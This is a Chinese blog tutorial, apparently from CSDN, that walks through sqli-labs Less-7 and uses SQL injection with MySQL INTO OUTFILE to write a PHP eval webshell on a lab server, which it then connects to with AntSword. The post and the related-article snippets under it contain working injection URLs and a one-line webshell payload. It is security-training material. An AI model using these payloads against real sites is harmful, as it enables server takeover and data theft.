SQL注入写webshell

已于 2024-01-23 20:41:52 修改
阅读量710 收藏
点赞数
分类专栏: 安全 文章标签: sql 数据库 安全 web安全 sql注入
于 2023-08-06 01:19:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49125123/article/details/132126524
版权

SQL注入写文件的三个必要条件

  1. Web目录有读写权限:

    当目标网站的Web目录具有读写权限时,攻击者可以通过注入恶意SQL语句将恶意文件写入服务器上的Web目录。

  2. 知道文件的绝对路径:

    攻击者需要知道目标系统上的文件的绝对路径,以便将恶意内容写入到指定目录的文件中。

  3. secure_file_priv为空或者包含当前目录地址(在my.ini配置):

    MySQL数据库服务器配置中的secure_file_priv参数规定了MySQL服务器允许执行INTO OUTFILE写入的目录。如果secure_file_priv为空,或者包含了当前目录地址,攻击者可以将恶意文件写入到该目录中,从而获取对服务器的控制权。

INTO OUTFILE是MySQL中用于将查询结果输出到文件的语法。它允许将查询结果写入到服务器文件系统中的指定文件。语法如下:

SELECT column1, column2, ...
INTO OUTFILE 'file_path'
FROM table_name
WHERE condition;

实验环境:服务器为Windows Server 2008 R2,数据库版本为MySQL5.7,实验网站为sqli-labs

sqli-labs第七关源码示例

在这里插入图片描述

通过源码可以看出,参数后面加上'))即可闭合参数

SELECT * FROM users WHERE id=(('1'))union select 1,2,3--+)) LIMIT 0,1

随便写一个文件试试:

http://192.168.171.30/sqli/Less-7/?id=1')) union select 1,2,3 into outfile 'C:/www/1.php'--+

在这里插入图片描述

虽然前面报错了,但这里查看服务器发现文件成功写入了

在这里插入图片描述

这次尝试写入shell

http://192.168.171.30/sqli/Less-7/?id=1')) union select 1,2,'<?php @eval($_POST["c"]);?>' into outfile 'C:/www/shell.php'--+

在这里插入图片描述

上传成功

在这里插入图片描述

用蚁剑连接成功

在这里插入图片描述

CVE-柠檬i
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
MySQL数据库webshell
weixin_45253622的博客
03-24 922
MySQL数据库webshell 判断 前提条件: 数据库当前用户为root权限 知道当前网站的绝对路径 PHP的GPC为OFF状态 入的那个路径存在入权限 注意点: secure_file_priv参数 这个参数用来限制数据导入和导出操作的效果,例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。 如果这个参数为空,这个变量没有效果。 如果这个参数设为一个目录名,MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在,M
sql注入webshell
qq_39816136的博客
04-18 1860
最近的hvv热度高涨,最近也是接到了许多的面试电话联系。 所有就sql注入出现的次数比较频繁,是初级hvv的重中之重 我感觉十有八九会问到sql注入,这里就解说一下这个sql注入webshell
SQL注入webshell
bring_coco的博客
03-13 5881
前言 在所有常用的关系数据库管理系统中均包含内置的向服务器文件系统文件的功能,通过这些内置的功能,我们可以将自己的webshell目录或文件进去 webshell条件 1.MYSQL用secure_file_priv这个配置项来完成对数据导入导出的限制, 如果secure_file_priv=NULL,MYSQL服务会禁止导入和导出操作。 如果secure_file_priv=/tmp/,MYSQL服务只能在/tmp/目录下导入和导出 如果secure_file_priv="" ,MYSQL
SQL注入webshell的实验
最新发布
wangqiao258的博客
07-01 238
1.知道网站绝对路径2.数据库ROOT权限3.secure_file_priv不为NULL,为空或为网站路径查询mysql路径,猜测网站绝对路径查询当前用户查询secure_file_privwebshell测试shell
SQL注入webshell的方法(union select入)
faclon666的博客
03-30 1303
(菜鸟一枚,日常记录,的不对的地方欢迎大家指正)
SQL注入GetShell的方法(1)
forinput的博客
05-06 3801
SQL注入getshell的五中方式
浅谈一次与sql注入 & webshell 的美丽“邂逅”
09-09
这次与SQL注入Webshell的“邂逅”提醒我们,即使在启用WAF和其他安全措施的情况下,也不能忽视安全防御的细节。定期审计、更新策略和快速响应异常是防止和减轻此类攻击的关键。企业应当建立完善的安全管理体系,...
机器学习实现web攻击检测——XSS、SQL注入Webshell检测.zip
05-06
在网络安全领域,Web攻击是常见的威胁之一,包括跨站脚本攻击(XSS)、SQL注入攻击和Webshell攻击。这些攻击手段对网站的安全性构成严重威胁,因此,使用机器学习来实现Web攻击检测已经成为一种有效的防御策略。本文...
第01篇:MySQL注入WebShell的5种方式1
08-03
- 避免被检测:使用编码、混淆、多层嵌套等技术来隐藏SQL注入痕迹。 - 控制权限:尽量使用低权限账户进行操作,降低被发现的风险。 - 临时文件管理:在某些工具如SQLmap中,临时WebShell可能会在Web目录下遗留,应...
利用漏洞注入SQL注入
11-10
SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL代码来操纵或获取数据库中的敏感信息。在本章中,我们将深入理解SQL注入的工作原理,并通过实例学习如何利用和防范这种攻击。 首先,我们来看6.1...
sql注入getshell的几种方式
热门推荐
good good study
04-29 2万+
介绍几种利用sql注入获取系统权限的方法,一是利用outfile函数,另外一种是利用--os-shell
sql注入getshell
摘星怪sec的blog
04-17 516
条件:web目录具有的权限,能够使用单引号;知道网站绝对路径;secure_file_priv为空以sqli-labs举例,secure_file_priv的值默认是NULL(5.5之前默认是空的),则表示限制mysqId不允许导入以及导出在mysql/my.ini中查看是否有secure_file_priv参数,这里是没有的因此我们加上去:secure_flie_priv=''即可这里进行16进制转换,因此是0X开头,入“
mysql数据入突然慢了_通过MySQLwebshell的几种方式
weixin_39648824的博客
11-28 306
当我们通过测试发现SQL注入,或拿到像phpMyAdmin之类的web数据库可视化管理工具,并想要进行下一步渗透的时候,可通过数据库webshell到目标服务器上,利用webshell管理工具控制目标服务器。下面将讲述几个通过MySQL数据库webshell的方法,以拿到phpMyAdmin为例。-01-通过outfileshell利用条件:1、root权限2、网站的绝对路径...
SQL注入Webshell
weixin_43749601的博客
03-28 2830
前言 在平时的CTF题目中,我们只是利用SQL注入漏洞去获取flag,但是在实际的渗透环境中,我们可以利用SQL注入漏洞去上传一个webshell,进而获取网站的后台权限。 首先,对于能否webshell是有条件的: secure_file_priv 支持数据导出。MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。如果secure_file_priv=NULL,MySQL服务会禁止导入和导出操作。通过命令查看secure-file-priv`的当前值,确认是否允许导入导
SQL注入WebShell方式小结
Mi1k7ea
12-09 2万+
这里小结一下通过SQL注入WebShell的方法。 传统的SQL语句shell 通过SQL注入select into outfile实现,如: 1' union select 1,'&lt;?php eval($_POST[a]);?&gt;' INTO OUTFILE '/var/www/tmp/nb.php'# sqlmapshell 前提都是需要对目标目录具有权限。 -...
SQL注入文件方法(获取webshell
Goodric的博客
04-08 2628
1、当前数据库用户为 root 权限 2、知道当前网站的绝对路径 3、secure_file_priv 的参数必须为空或目录地址 4、PHP的 GPC 为 off状态;(魔术引号,GET,POST,Cookie)
SQL注入】从注入到获取服务器shell,记一次完整的SQL注入攻击过程
kkza的博客
10-28 2147
注入 以pikachu为例,首先发现一个数据查询的点,对其进行手工验证 易知存在SQL注入 shell 通过mysql文件需满足 连接数据库是root用户 my.ini配置文件需明确secure_file_priv="目录",参考:MySQL文件 ...
sql注入和phpmyadmin日志webshell
weixin_54813510的博客
05-25 1751
webshell前提条件:1、需要root权限。2、知道网站根目录的绝对路径。3、数据库my.ini配置文件需要secure_file_priv配置为空。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值